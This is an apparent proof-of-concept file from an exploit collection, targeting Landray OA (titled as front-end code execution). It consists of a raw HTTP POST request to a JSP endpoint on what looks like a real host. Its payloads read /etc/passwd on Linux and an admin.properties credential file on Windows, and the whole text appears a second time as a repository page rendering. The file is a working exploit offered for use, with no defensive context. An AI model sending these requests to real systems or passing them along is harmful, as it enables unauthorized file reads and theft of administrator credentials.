POC/wpoc/蓝凌OA/某凌OA前台代码执行.md

## 某凌OA前台代码执行
```
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: www.ynjd.cn:801
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

var={"body":{"file":"file:///etc/passwd"}}
```
var={"body":{"file":"file:///etc/passwd"}}  // linux


var={"body":{"file":"/WEB-INF/KnssConfig/admin.properties"}}  //windows
first commit 2025-03-04 23:12:57 +08:00			`## 某凌OA前台代码执行`
			```
			`POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1`
			`Host: www.ynjd.cn:801`
			`User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)`
			`Accept: /`
			`Connection: Keep-Alive`
			`Content-Length: 42`
			`Content-Type: application/x-www-form-urlencoded`

			`var={"body":{"file":"file:///etc/passwd"}}`
			```
			`var={"body":{"file":"file:///etc/passwd"}} // linux`


			`var={"body":{"file":"/WEB-INF/KnssConfig/admin.properties"}} //windows`